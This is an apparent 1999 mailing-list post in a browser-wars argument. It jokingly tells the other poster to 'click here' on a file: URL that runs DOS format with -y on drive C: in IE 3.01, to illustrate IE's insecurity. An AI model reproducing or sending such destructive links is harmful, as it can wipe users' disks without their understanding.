[plug] MSIE sucks less than Netscape...? (-:

Leon Brooks leonb at bounce.networx.net.au
Tue Aug 10 10:42:34 WST 1999

Mike Holland wrote:
> And BTW, MS sell lots of good apps that dont suck, except that they wont
> run on a decent non-sucking OS. Even MSIE sucks less than Netscape.

Michael, Michael, Michael... what shall I say? Click here:

    file:C|/windows/dosprmpt.pif%20-C%20format%20-y%20C|

(requires IE 3.01 and a standard Windows install for best results) (-:

Sure, IE 5 runs faster and so on, but it's still dangerous, and still
does MS-proprietary things.

--
"Conservatives believe it when they see it. Liberals see it when
they believe it." -- Rep. Dick Armey